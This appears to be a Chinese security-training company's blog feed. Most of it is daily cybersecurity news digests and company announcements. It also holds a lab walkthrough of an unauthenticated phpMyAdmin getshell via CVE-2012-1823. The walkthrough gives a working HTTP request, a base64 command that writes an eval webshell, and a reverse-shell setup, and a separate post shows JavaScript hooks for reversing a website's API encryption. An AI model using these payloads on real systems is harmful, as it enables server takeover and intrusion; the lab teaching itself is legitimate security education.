网络安全日报 2024年02月02日
1、意大利多个企业受到USB传播加密劫持恶意软件攻击
https://www.mandiant.com/resources/blog/unc4990-evolution-usb-malware 一个名为UNC4990的威胁行为体,出于经济动机正在利用武器化 USB 设备作为初始感染媒介攻击意大利的多个组织。这些攻击针对多个行业,包括医疗、交通、建筑和物流。UNC4990 操作通常涉及广泛的 USB 感染,然后部署 EMPTYSPACE 下载程序。攻击操作集群依赖 GitHub、Vimeo 和 Ars Technica 等第三方网站来托管编码的附加阶段,并在执行链的早期通过 PowerShell 下载和解码。目前尚不清楚 UNC4990的最终目标
2、巴西联邦调查局捣毁Grandoreiro银行木马
https://www.gov.br/pf/pt-br/assuntos/noticias/2024/01/pf-combate-organizacao-criminosa-que-praticava-fraudes-bancarias-eletronicas-contra-vitimas-no-exterior Grandoreiro是 Javali、Melcoz、Casabeniero、Mekotio 和 Vadokrist 等众多拉丁美洲银行木马之一,主要针对西班牙、墨西哥、巴西和阿根廷等国家。该木马自 2017 年以来一直活跃,其既可以通过键盘记录器和屏幕截图窃取数据,也可以在受感染
3、CISA警告Apple iOS和macOS中的严重缺陷被积极利用
https://thehackernews.com/2024/02/cisa-warns-of-active-exploitation-of.html 美国网络安全和基础设施安全局 (CISA) 周三根据活跃利用的证据,将影响 iOS、iPadOS、macOS、tvOS 和 watchOS 的高严重性缺陷添加到其已知可利用漏洞 ( KEV ) 目录中。该漏洞编号为CVE-2022-48618(CVSS 评分:7.8),涉及内核组件中的错误。鉴于 CVE-2022-48618 的活跃利用,CISA 建议联邦民事行政部门 (FCEB) 机构在 2024 年 2 月 21 日之前应用修复程序。
4、研究人员发现攻击者可利用RunC漏洞获得主机访问权限
https://snyk.io/blog/leaky-vessels-docker-runc-container-breakout-vulnerabilities/ runC是一个用于在 Linux 上生成和运行容器的工具。最初是作为 Docker 的一部分开发的,后于 2015 年分离成一个单独的开源库。runC 命令行工具中已披露多个安全漏洞,威胁者可利用这些漏洞逃离容器的边界并发起后续攻击。这些漏洞编号为 CVE-2024-21626、CVE-2024-23651、CVE-2024-23652 和 CVE-2024-23653,被网络安全供应商 Snyk统称为Leaky Vessels
5、至少30名记者、律师和活动人士在约旦遭到Pegasus攻击
https://www.securityweek.com/at-least-30-journalists-lawyers-and-activists-hacked-with-pegasus-in-jordan-forensic-probe-finds/ NSO 集团的 Pegasus 间谍软件在约旦被用来侵入记者、律师、人权和政治活动人士的手机。
6、江森自控称勒索软件攻击已造成 2700 万美元损失
https://www.freebuf.com/news/391141.html 据BleepingComputer 消息,江森自控国际公司 (Johnson Controls International) 确认,2023 年 9 月的一次勒索软件攻击给该公司造成了至少2700 万美元的损失,并导致了数据泄露。
7、工信部关于印发工业控制系统网络安全防护指南的通知
https://wap.miit.gov.cn/zwgk/zcwj/wjfb/tz/art/2024/art_b9415a5455934902b04961909b1c2873.html 为适应新时期工业控制系统网络安全(以下简称工控安全)形势,进一步指导企业提升工控安全防护水平,夯实新型工业化发展安全根基,制定本指南。
8、阿联酋政府网络安全首席称,他们每天面临5万次网络攻击
https://www.darkreading.com/cyber-risk/uae-government-cyber-chief-50k-cyberattacks-daily 他们所面临的威胁类型包括从端口扫描和钓鱼邮件到DDoS攻击和勒索软件等,这些威胁对政府的多个领域产生了影响。
9、全国信安标委发布7项网络安全推荐性国家标准计划
https://www.freebuf.com/news/391086.html 请项目所属工作组制定项目推进计划,并督促项目牵头承担单位按计划抓紧落实,在计划执行中要加强协调,广泛征求意见,确保标准质量和水平,按要求完成国家标准制修订任务。
10、意大利数据保护监管机构指控 ChatGPT 侵犯隐私
https://thehackernews.com/2024/01/italian-data-protection-watchdog.html 意大利数据保护机构已通知 ChatGPT 的制造商 OpenAI,该公司可能违反欧盟 GDPR 隐私法。这些问题包括收集个人数据、年龄保护以及敏感信息的潜在暴露。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
phpMyAdmin 未授权Getshell
前言
做渗透测试的时候偶然发现,phpmyadmin少见的打法,以下就用靶场进行演示了。
0x01漏洞发现
环境搭建使用metasploitable2,可在网上搜索下载,搭建很简单这里不多说了。
发现phpmyadmin,如果这个时候无法登陆,且也没有前台的漏洞,可以继续在这个phpmyadmin目录下做文章。
发现setup
0x02漏洞利用
进行漏洞利用
https://juejin.cn/post/7042901479388086285POST
/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input
HTTP/1.1
Host: 192.168.48.143
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: phpMyAdmin=bdbb427ed9c5e8616fe90261adcfb7229d6ca189;
pma_lang=en-utf-8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
\<?php
passthru(\'id\');
die();
?\>
这里利用的是CVE-2012-1823
?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
解码后
?-d allow_url_include=on -d auto_prepend_file=php://input
开启allow_url_include和auto_prepend_file
其中allow_url_include可以远程文件包含,auto_prepend_file加载php://input
其中php://input 可以读取http entitybody中指定长度的值,由Content-Length指定长度
写一句话木马getshell
echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==" | base64 -d >shell.php
0x03反弹shell
利用kali现成的
cp /usr/share/webshells/php/php-reverse-shell.php ./1.php
修改这个ip
修改ip
反弹shell成功,且无文件生成。
网络安全日报 2024年02月01日
1、攻击者滥用Microsoft Teams群聊传播DarkGate恶意软件
https://cybersecurity.att.com/blogs/security-essentials/darkgate-malware-delivered-via-microsoft-teams-detection-and-response 新的网络钓鱼攻击滥用 Microsoft Teams 群聊请求来推送恶意附件,在受害者的系统上安装 DarkGate 恶意软件负载。攻击者使用看似受感染的 Teams 用户(或域)发送了 1000 多个恶意 Teams 群聊邀请。目标接受聊天请求后,威胁行为者会诱骗他们使用名为“Navigating Future Changes October
2、奔驰企业网络GitHub令牌配置错误导致源代码泄露
https://redhuntlabs.com/blog/mercedes-benz-source-code-at-risk-github-token-mishap-sparks-major-security-concerns/ 处理不当的 GitHub 令牌可以不受限制地访问梅赛德斯-奔驰的内部 GitHub Enterprise Service,从而将源代码暴露给公众。梅赛德斯-奔驰是一家著名的德国汽车、公共汽车和卡车制造商,以其丰富的创新历史、豪华的设计和顶级的制造质量而闻名。与许多现代汽车制造商一样,该品牌在其车辆和服务中使用软件,包括安全和控制系统、信息娱乐、自动驾驶、诊断和维护工
3、研究人员披露Trigona与Mimic勒索软件背后为同一攻击者
https://asec.ahnlab.com/en/61000/ 研究人员最近发现了Trigona勒索软件威胁行为者同时安装Mimic 勒索软件的一项新活动。与过去的案例一样,最近检测到的攻击以 MS-SQL 服务器为目标,并因在恶意软件安装过程中利用MS-SQL 服务器中的批量复制程序 (BCP)实用程序而引人注目。Trigona 勒索软件已知至少自 2022 年 6 月以来一直活跃,通常针对 MS-SQL 服务器进行攻击,并且仍然处于活动状态。Mimic勒索软件首次发现于2022年6月,2024年1 月,研究人员发现威胁行为者同样了攻击管理不善的MS-SQL服务器并安装Mimic的案例
4、Tor 代码审计中发现了十多个漏洞
https://www.securityweek.com/tor-code-audit-finds-17-vulnerabilities/ Tor 审计中发现了十多个漏洞,其中包括一个可被用来注入任意网桥的高风险漏洞。
5、RunC 漏洞可导致容器逃逸获取宿主机访问权限
https://thehackernews.com/2024/02/runc-flaws-enable-container-escapes.html runC 命令行工具中已披露多个安全漏洞,威胁者可利用这些漏洞逃离容器的边界并发起后续攻击。
6、Ripple 联合创始人被盗价值约 1.12 亿美元的 XRP
https://securityaffairs.com/158420/cyber-crime/crooks-stole-112m-ripple.html 骗子从 Ripple 联合创始人 Chris Larsen 的加密钱包中窃取了价值约 1.12 亿美元的 Ripple XRP。
7、Ivanti 警告称存在新的被积极利用的零日漏洞
https://securityaffairs.com/158403/hacking/ivanti-actively-exploited-zero-day-cve-2024-21893.html Ivanti 警告其 Connect Secure 和 Policy Secure 产品中存在两个新漏洞,其中之一已被广泛利用
8、 报告:关基保护市场未来十年将保持强劲增长
http://www.anquan419.com/knews/24/6600.html 报告指出,2023年,关键基础设施保护市场的收入超过1400亿美元,由于关基设施的重要性,报告预计未来十年该市场将一直保持强劲增长态势。
9、因受害者拒绝支付,勒索软件的赎金支付率降历史最低
https://www.bleepingcomputer.com/news/security/ransomware-payments-drop-to-record-low-as-victims-refuse-to-pay/ Coveware研究发现,即便在遭受网络攻击且数据被盗的情况下,上一季度的赎金支付率也仅为26%。不仅支付勒索软件赎金的受害者数量减少,实际支付的赎金金额也有所下降。
10、研究人员发现新的大规模恐吓软件和 PUP 传播活动
Unit 42 研究人员发现了一个我们称之为 ApateWeb 的大规模活动,该活动使用超过 130,000 个域的网络来传播恐吓软件、隐匿垃圾程序 (PUP) 和其他诈骗页面。在这些 PUP 中,发现了多个广告软件程序,包括流氓浏览器和不同的浏览器扩展。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
蚁景科技2024年春节放假通知
尊敬的客户伙伴:
2024年龙年春节来临,蚁景科技将于2024年2月8日至2月17日放假,共10天,2月18日复工;春节假期期间蚁景网安实验室将正常运营,若您遇到紧急事项,可联系4006-123-731。
感谢客户伙伴一直以来对我们的支持与厚爱, 新的一年,我们将全力以赴,继续为客户伙伴提供更优质的服务!
祝愿大家新年快乐、龍光焕发、龍年龘吉、万事兴龍!
某观鸟平台逆向分析
1.抓包:
发现url:https://api.xxxxxxx.cn/front/record/activity/search
请求头三处加密,requestId、sign(疑似md5)、timestamp(时间戳)
表单数据加密:
请求返回数据加密:
2.分析:
通过抓包,发现请求头、表单、返回的数据均有加密,如果你逆向的网站比较多会发现,一般加密的地方都在一起,网站大概率会使用JSON.stringify,来将数据转换为json字符串之后再进行加密,因此可以使用hook断点
hook JSON.stringify代码:
(function() {
var stringify = JSON.stringify;
JSON.stringify = function(params) {
console.log("Hook JSON.stringify ——> ", params);
debugger;
return stringify(params);
}
})();
将hook代码注入控制台,翻页断点:
找到上一个栈:
可以看出RequestId是由getUuid生成:
sign由MD5(e + d + c)生成:
timestamp由Date.parse(new Date())生成:
发现表单是使用RSA加密,并且用setPublicKey方法设置了要使用的公钥。然后,使用encryptUnicodeLong方法对参数e进行加密。
使用hook JSON.parse找到返回数据解密位置,和上面hook代码一样的操作:
(function() {
var parse = JSON.parse;
JSON.parse = function(params) {
console.log("Hook JSON.parse ——> ", params);
debugger;
return parse(params);
}
})();
找到解密位置:
跟进后,发现解密代码由AES解密:
3.扣代码:
将js代码复制下来,平且补全代码
网络安全日报 2024年01月31日
1、攻击者针对百万用户级的WordPress网站数据库插件发起攻击
https://www.bleepingcomputer.com/news/security/hackers-target-wordpress-database-plugin-active-on-1-million-sites/ 已检测到针对“Better Search Replace”WordPress 插件中严重缺陷的恶意活动,研究人员在过去 24 小时内观察到了数千次尝试。Better Search Replace 是一个安装量超过一百万的 WordPress 插件,可在将网站移动到新域或服务器时帮助在数据库中进行搜索和替换操作。管理员可以使用它来搜索和替换数据库中的特定文本或处理序列
2、攻击者利用公开暴露的主机远程桌面部署Trigona勒索软件
https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/ 2022 年 12 月下旬,研究人员观察到威胁行为者利用公开暴露的远程桌面协议 (RDP) 主机,导致数据泄露和 Trigona 勒索软件的部署。平安夜,在获得初始访问权限后的短短三个小时内,威胁行为者就在整个网络上执行了勒索软件。威胁行为者使用批处理脚本来窃取数据,并放弃使用一系列可能阻碍防御措施的其他批处理脚本、建立用户帐户、通过防火墙授予 RDP 访问权限以及自动执行其他入侵操作。
3、研究人员披露Phobos勒索软件变体Faust的攻击活动
https://www.fortinet.com/blog/threat-research/phobos-ransomware-variant-launches-attack-faust Phobos 勒索软件系列是一组恶意软件,旨在加密受害者计算机上的文件。它于 2019 年出现,此后参与了多次网络攻击。这种勒索软件通常会附加带有唯一扩展名的加密文件,并要求以加密货币支付赎金以获得解密密钥。研究人员捕获并报告了 Phobos 系列的多个勒索软件变体,包括EKING和8Base。最近,研究人员发现了一份 Office 文档,其中包含一个 VBA 脚本,旨在传播 FAUST 勒索软件(Phob
4、研究人员称约4500个在线Jenkins服务可遭受RCE漏洞攻击
https://twitter.com/Shadowserver/status/1751964510955372855 研究人员发现,大约 45000 个在线暴露的 Jenkins 实例容易受到 CVE-2024-23897 的影响,这是一个严重的远程代码执行 (RCE) 缺陷,针对该缺陷的多个公开概念验证 (PoC) 漏洞正在流传。Jenkins 是领先的 CI/CD 开源自动化服务器,允许开发人员简化构建、测试和部署流程。它具有广泛的插件支持,并为各种任务和规模的组织提供服务。2024 年 1 月 24 日,该项目发布了版本 2.442 和 LTS 2.426.3,以修复 CVE-202
5、能源公司施耐德电气遭遇Cactus勒索软件攻击
https://www.bleepingcomputer.com/news/security/energy-giant-schneider-electric-hit-by-cactus-ransomware-attack/ 据知情人士透露,能源管理和自动化巨头施耐德电气遭受了 Cactus 勒索软件攻击,导致公司数据被盗。勒索软件攻击于本月初的 1 月 17 日袭击了该公司的可持续发展业务部门。这次攻击扰乱了施耐德电气的部分资源顾问云平台,该平台至今仍处于中断状态。据报道,勒索软件团伙在网络攻击期间窃取了数 TB 的公司数据,现在威胁该公司,如果不支付赎金,就会泄露被盗的数据。虽然尚不清楚被
6、黑客论坛出售 7.5 亿印度移动用户数据
https://www.securityweek.com/data-of-750-million-indian-mobile-subscribers-sold-on-hacker-forums/ 暗网上出现了一个包含 85% 印度人口信息的海量数据库。
7、Juniper修复了交换机、防火墙中的高危漏洞
https://www.securityweek.com/juniper-networks-patches-vulnerabilities-in-switches-firewalls/ 瞻博网络 Junos OS 的 J-Web 界面中存在高严重性缺陷,可能导致远程任意命令执行。
8、GLIBC 中的提权漏洞影响许多LINUX 发行版
https://securityaffairs.com/158369/breaking-news/gnu-library-c-glibc-cve-2023-6246-flaw.html Qualys 威胁研究单位在GNU C 库 (glibc)中发现了四个安全漏洞,其中包括基于堆的缓冲区溢出(编号为 CVE-2023-6246)。该缺陷存在于 glibc 的 syslog 功能中,攻击者可以利用该缺陷通过提权来获得 root 访问权限。
9、1.5亿条会员信息“裸奔”,知名火锅品牌被罚
https://www.freebuf.com/news/390992.html 据上海市网信办通报,上述知名火锅连锁品牌违法违规行为集中体现在两个环节:在收集个人信息环节,其外送微信小程序仍在强制索取精准位置信息;在存储个人信息环节,其创设近30年来形成的1.5亿条会员个人信息以及18万条公司员工信息未加密存储,“多年来一直处于‘裸奔’状态”。
10、Google上的恶意广告通过虚假消息应用瞄准中国用户
https://thehackernews.com/2024/01/malicious-ads-on-google-target-chinese.html 作为正在进行的恶意广告活动的一部分,中文用户已成为 Telegram 等受限消息应用程序的恶意 Google 广告的目标。Malwarebytes 在1月25日的一份报告中表示:“威胁行为者正在滥用 Google 广告商帐户来创建恶意广告,并将其指向毫无戒心的用户下载远程管理木马 (RAT) 页面。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
蚁景科技承办网安人才实践创新能力培养暨第十一届方班教学研讨会
2024年1月21日-24日,由中国网络空间安全人才教育论坛(简称“网教盟”)主办,广州大学会同湖南蚁景科技有限公司、积至(海南)信息技术有限公司联合承办的网安人才实践创新能力培养暨第十一届方班教学研讨会在海南省澄迈生态软件园顺利召开。
中国工程院方滨兴院士、教育部网安专业教指委秘书长封化民教授、网教盟副理事长兼秘书长刘欣然教授、广州大学副校长田志宏教授、国防科技大学贾焰教授、海南省方滨兴院士工作站负责人王媛娣女士、北京航空航天大学李舟军教授、浙江大学徐文渊教授、蚁景科技CEO彭坤先生,还有来自网教盟成员单位、方班拓展班及其他社会组织的网安教育科研从业者共计一百余人通过线上线下方式参加了会议。
在正会前的预热观摩课环节,张尧学院士、高文院士、郑庆华院士应邀点评了方班拓展班研讨厅(辩论)课。正会开幕环节,封化民秘书长、刘欣然秘书长、田志宏副校长、王媛娣女士分别做了开幕致辞。
会上,包括蚁景科技在内的多名网安行业企业专家在构建网络安全实践实训资源上的优势与案例、基于实践实训课程的校企协作模式和资源及分析与演练课程教学分析进行了专题研讨,对课程建设提出了意见建议。
在思辨能力培养主题日,“创新与思辨”课程建设经验分享环节由广州大学殷丽华副院长主持,来自广州大学李默涵教授和刘园教授、北京邮电大学王春露教授、哈尔滨工业大学(深圳)徐国爱教授、南京邮电大学黄海平副院长等分别代表各自单位做了主题报告;课程建设研讨环节由广州大学(网络空间先进技术研究院)鲁辉院长主持,广州大学王乐、李树栋、仇晶、张美范等四位老师分别带动引导了选题、辅导、提问、评分等课程建设四个核心主题的讨论。
在工程实践能力培养主题日,由广州大学王乐副院长主持,广州大学李超教授介绍了方班演武堂课程的建设情况并梳理了需要改进的问题和不足;杨建业、孙哲、谭庆丰等三位老师,分别从课程选题、模式优化、校企合作等三个维度带动引导了主题研讨。方院士和田校长分别从主题选择、课程关注点、教学班设置、校企双向奔赴等角度给予了指导。
网安本科专业及课程建设主题环节,由宁洪副院长主持,与会老师分别就本科专业建设三年规划、课程群建设计划和目标、课程思政等进行分析和研讨。
网安人才实践创新能力培养暨第十一届方班教学研讨会在思辨能力培养模式、工程实践能力培养渠道、本科专业建设方式等方面进行了充分的沟通研讨,达到了预期的效果。
湖南蚁景科技有限公司作为国内领先的“网络安全人才培养服务提供商”,为配合国家网络安全人才培养战略,以市场需求为导向,以能力提升为目标,从高校科研、教学实训及企事业单位实际需求出发,基于对“互联网+教育”的深刻理解,通过自主研发的“网络安全人才实训靶场”,为高校、政企单位、科研院所等行业客户提供满足在线实验教学的虚拟实验环境与各种课件资源,同时为广大网安爱好者提供实战技能培训、人才推荐等服务。
网络安全日报 2024年01月30日
1、乌克兰黑客组织针对俄罗斯空间水文气象中心发起攻击
https://www.bleepingcomputer.com/news/security/ukraine-hack-wiped-2-petabytes-of-data-from-russian-research-center/ 乌克兰国防部主要情报局声称,亲乌克兰的黑客活动分子侵入了俄罗斯空间水文气象中心(又名“planeta”(планета)),并擦除了 2PB 的数据。Planeta 是一个州立研究中心,利用空间卫星数据和雷达和站等地面资源提供有关天气、气候、自然灾害、极端现象和火山监测的信息和准确预测。该机构隶属于俄罗斯航天局,为军事、民航、农业和海事等部门提供支持。在另一起与国
2、研究人员披露部分iPhone应用滥用iOS推送通知收集用户数据
https://twitter.com/mysk_co/status/1750502700112916504 许多 iOS 应用程序正在使用由推送通知触发的后台进程来收集有关设备的用户数据,从而可能允许创建用于跟踪的指纹配置文件。研究人员表示,这些应用程序绕过了苹果的后台应用程序活动限制,并对 iPhone 用户构成隐私风险。“应用程序不应尝试根据收集的数据秘密构建用户配置文件,并且不得尝试、促进或鼓励其他人识别匿名用户或根据从 Apple 提供的 API 收集的数据或您所说的任何数据重建用户配置文件。以‘匿名’、‘聚合’或其他不可识别的方式收集,” 苹果应用商店审查指南的一部分写道。在分析
3、研究人员披露恶意PyPI软件包传播WhiteSnake窃取器
https://www.fortinet.com/blog/threat-research/info-stealing-packages-hidden-in-pypi 研究人员在开源 Python 包索引 (PyPI) 存储库中发现了恶意包,这些包在 Windows 系统上传播名为WhiteSnake Stealer的信息窃取恶意软件。这些包含恶意软件的软件包名为 nigpal、figflix、telerer、seGMM、fbdebug、sGMM、myGens、NewGends 和 TestLibs111。它们是由名为“WS”的威胁行为者上传的。这些软件包在其 setup.py 文件中合并了
4、研究人员披露Jenkins多个严重RCE漏洞已有在野积极利用
https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/ 针对 Jenkins 关键漏洞的多个概念验证 (PoC) 漏洞已公开,该漏洞允许未经身份验证的攻击者读取任意文件,一些研究人员报告攻击者积极利用攻击中的漏洞。Jenkins 是一种开源自动化服务器,广泛用于软件开发,特别是持续集成(CI)和持续部署(CD)。它在自动化软件开发过程的各个部分(例如构建、测试和部署应用程序)方面发挥着关键作用。它支持一千多个集成插件,可供各种规模
5、德克萨斯州医疗提供商遭遇数据泄露影响其390万患者信息
https://www.pjats.com/downloads/Notice.pdf 德克萨斯州一家物理和职业治疗提供商通知近 400 万患者,去年内华达州一家医疗转录供应商发生数据盗窃事件,受害者人数不断飙升,而他们也加入了这一行列。Concentra Health Services 于 1 月 9 日向美国卫生与公众服务部报告称,2023 年 Perry Johnson & Associates 遭受的黑客攻击已影响其 390 万患者。医疗转录器的泄露似乎已经暴露了至少 1400 万患者的个人数据,并且这一数字还在增加。虽然 PJ&A 尚未公开列出所有受此次黑客攻击影响的客户,但 Con
6、梅赛德斯-奔驰意外泄露敏感数据包括源代码
https://securityaffairs.com/158306/data-breach/mercedes-benz-data-leak.html 研究人员发现,梅赛德斯-奔驰无意中将私钥留在网上,暴露了内部数据,包括公司的源代码。
7、美国NSA在从数据经纪人那里购买互联网浏览记录
https://securityaffairs.com/158277/intelligence/nsa-buys-internet-browsing-records.html 美国国家安全局(NSA)承认在没有法院命令的情况下从数据经纪人处购买互联网浏览记录以监控美国人的在线活动。
8、研究人员发现 Outlook 漏洞可以泄露 NTLM 密码
https://thehackernews.com/2024/01/researchers-uncover-outlook.html Microsoft Outlook 中现已修补的安全漏洞可能会被威胁行为者利用,在打开特制文件时访问 NT LAN Manager (NTLM) v2 哈希密码。
9、Pwn2Own Automotive 2024落幕共揭露49个零日漏洞
https://www.freebuf.com/news/390890.html 1月26日,为期3天的Pwn2Own Automotive 2024正式落下帷幕,作为趋势科技举办的首届专门针对汽车领域的 Pwn2Own 安全竞赛,本次赛事总共发现了49个与汽车相关的零日漏洞的,并向参赛者累计发放了超130万美元奖金。
10、二维码钓鱼攻击激增587%:用户频频落入社工诈骗陷阱
https://www.hackread.com/qr-code-phishing-social-engineering-scams/ 在这种攻击中,诈骗者利用二维码将用户重定向到一个窃取凭证的页面,并根据用户的设备调整重定向链。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
湖南蚁景科技成功举办2024网络安全高级研修班
为深入学习贯彻关于网络强国的战略思想,加强网络安全宣传教育和人才培养,赋能学校打造经验丰富的网安教学师资队伍,全面提升网络安全技能的实战教学水平。2024年1月22日至1月26日,由中国网络空间安全人才教育论坛指导,湖南蚁景科技有限公司主办的“2024网络安全高级研修班”在长沙圆满举行。
此次研修班吸引了来自全国各地的数十位高校优秀老师参与(文末附参会老师高校名单),会议在线上及线下同步进行,共同提升网络安全技能。
开班仪式上,湖南蚁景科技有限公司副总皮开元为本次研修班致辞,对来自五湖四海的参会老师表达了热烈的欢迎。
随后,蚁景科技宋小玲详细介绍了公司的网络安全产品,她表示,蚁景科技一直致力于网络安全教育培训领域的研究和开发,拥有自主知识产权的“网络安全人才实训靶场”,能为高校提供满足在线网安实战教学的虚拟实验环境及其丰富的课件资源。
现已形成成熟的学、训、赛三大体系;全方位覆盖了网络安全领域包括Web安全、渗透测试、CTF网络攻防、信息安全管理等内容。丰富的课件库、快捷方便的教学环境、科学的知识图谱、清晰的学习路径,结合蚁景科技与各大高校开展实习实训的丰富经验,能为院校实习实训工作开展与教师网安教学效率的提升提供有力支持。
此次研修班课程聚焦“网安应急响应”,前期主办方从教学安排、师资配备、课程内容等诸多方面做了最精心的策划与安排。蚁景网安资深讲师刘俊明全程授课,授课老师具备多年网安实战及培训经验,曾为高校、税务、移动、电网、黄金、烟草等政府事业单位进行网安实战和安全服务技能培训;为国防科大、中南大学、湖南大学、中国海洋大学、广州大学等高校进行网络安全、攻防演练的系统化培训。
授课期间,从理论到实操,对重点难点进行了深入浅出的讲解。课程内容丰富,实用性强,涵盖了网络安全领域的多个方面。参会老师在培训期间积极参与,踊跃提问,学习氛围浓厚。参会老师纷纷表示,此次培训收获颇丰,对提升自身的网络安全意识和技能水平有很大的帮助。每日培训间隙,会务组精心准备了茶点茶歇。这些贴心的服务为忙碌的学习过程增添了一份轻松与惬意。
培训课程结束后,会务组还特别安排了一天的韶山之行,让来自全国各地的老师亲身感受湖南红色革命文化。这次活动不仅加深了老师们对红色革命文化的了解,也促进了彼此之间的交流与互动。此次网络安全研修班的成功举办,得益于湖南蚁景科技有限公司的精心组织和广大老师的积极参与。会后,老师们纷纷表达了对此次研修班的高度肯定。他们认为,此次培训不仅提高了自身的网络安全意识和技能水平,也为我国网络安全教学事业的发展注入了新的活力。2024网络安全高级研修班圆满落下帷幕,蚁景科技将持续为各大高校提供全方位的网安人才培养解决方案,感谢老师们对蚁景科技的信任与支持。同时,我们也期待与更多的教育平台和高校合作,共同推进我国网
本次研修班参会老师来自以下院校(部分)
排名不分先后
中南大学、国防科技大学信息通信学院、安徽理工大学、中国人民警察大学、陆军特种作战学院、齐鲁工业大学、西华大学、沈阳理工大学、天津商业大学、陕西工商职业学院、广东岭南职业技术学院、湖北科技学院、福建农林大学、温州科技职业学院、南昌交通学院、黑龙江司法警官职业学院、宁波大学科学技术学院、浙江工业大学、湖南信息学院、浙江水利水电学院、西南石油大学、江苏警官学院、新疆财经大学、四川警察学院、郑州西亚斯学院、湖南科技大学、温州科技职业学院、郑州轻工业学院
网络安全日报 2024年01月29日
1、Confluence安全漏洞在野积极利用约造成4万次攻击
https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/ 在公开披露后三天内,恶意行为者已开始积极利用最近披露的影响 Atlassian Confluence 数据中心和 Confluence 服务器的关键安全漏洞。该漏洞编号为CVE-2023-22527(CVSS 评分:10.0),影响软件的过时版本,允许未经身份验证的攻击者在易受影响的安装上实现远程代码执行。该缺陷影响 2023 年 12 月 5 日之前发布的 Confluence Data Center 和 Server 8 版本
2、隐藏在破解应用中的MacOS恶意软件针对加密钱包发起攻击
https://securelist.com/new-macos-backdoor-crypto-stealer/111778/ 据观察,破解的软件会用一种先前未记录的窃取恶意软件感染 Apple macOS 用户,该恶意软件能够收集系统信息和加密货币钱包数据。它们旨在针对运行 macOS Ventura 13.6 及更高版本的机器,这表明该恶意软件能够感染采用英特尔和苹果硅处理器架构的 Mac。攻击链利用诱杀磁盘映像 (DMG) 文件,其中包括名为“Activator”的程序和 xScope 等合法软件的盗版版本。建议最终打开 DMG 文件的用户将这两个文件移至“应用程序”文件夹并运行 A
3、超过5300台GitLab服务器遭受零点击帐户接管漏洞攻击
https://www.bleepingcomputer.com/news/security/over-5-300-gitlab-servers-exposed-to-zero-click-account-takeover-attacks/ 超过 5300 个暴露在互联网上的 GitLab 实例容易受到 CVE-2023-7028 的攻击,这是 GitLab 本月早些时候警告的零点击帐户接管漏洞。该关键漏洞(CVSS 评分:10.0)允许攻击者将目标帐户的密码重置电子邮件发送到攻击者控制的电子邮件地址,从而允许威胁行为者更改密码并接管该帐户。尽管该缺陷不会绕过双因素身份验证 (2FA),但对
4、英国国家网络安全中心警告未来两年勒索攻击将加剧滥用AI技术
https://www.ncsc.gov.uk/news/global-ransomware-threat-expected-to-rise-with-ai 英国国家网络安全中心 (NCSC) 警告称,人工智能 (AI) 工具短期内将对网络安全产生不利影响,从而加剧勒索软件的威胁。该机构表示,网络犯罪分子已经将人工智能用于各种目的,预计这种现象在未来两年内将会恶化,从而导致网络攻击的数量和严重性增加。NCSC 认为 ,人工智能将使缺乏经验的威胁行为者、受雇黑客和低技能的黑客活动分子能够进行更有效、量身定制的攻击,否则这些攻击将需要大量时间、技术知识和操作工作。大多数可用的大型学习模型 (LL
5、全球金融科技公司EquiLend遭受网络攻击后导致服务中断
https://www.bleepingcomputer.com/news/security/global-fintech-firm-equilend-offline-after-recent-cyberattack/ 总部位于纽约的全球金融科技公司 EquiLend 表示,部分系统在周一的网络攻击中离线,导致其运营中断。事件发生后,这家技术、数据和分析公司还检测到对其网络的未经授权的访问,目前正在努力恢复所有受影响的服务。EquiLend 发言人称:“我们立即展开调查,发现了一起涉及未经授权访问我们系统的网络安全事件。我们立即采取措施保护我们的系统,并正在有条不紊地尽快恢复相关服务。”Eq
6、Windows11发布更新补丁修复蓝牙音频缺陷及其他已知错误
https://prod.support.services.microsoft.com/en-us/topic/january-23-2024-kb5034204-os-builds-22621-3085-and-22631-3085-preview-7652acf2-56dc-430e-b8ef-ec8f56ec1028 微软发布了 Windows 11 版本 22H2 和 23H2 的 2024 年 1 月预览更新,其中修复了蓝牙音频错误并解决了 24 个已知问题。此月度非安全可选累积更新(编号为KB5034204)将使 Windows 管理员能够测试改进和修复,这些改进和修复将通过即将
7、Jenkins安全漏洞可以导致服务器遭受远程代码执行
